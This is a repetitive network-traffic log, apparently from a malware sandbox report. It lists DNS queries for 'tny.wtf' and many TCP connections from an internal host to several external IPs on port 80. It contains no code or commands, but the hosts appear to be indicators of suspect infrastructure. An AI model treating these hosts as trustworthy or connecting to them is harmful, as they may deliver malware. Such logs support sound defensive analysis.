              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficDNS query: name: tny.wtf
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.46.176.133:80
              Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49165
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
              Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.227.225.166:80
              Source: global trafficTCP traffic: 192.227.225.166:80 -> 192.168.2.22:49170
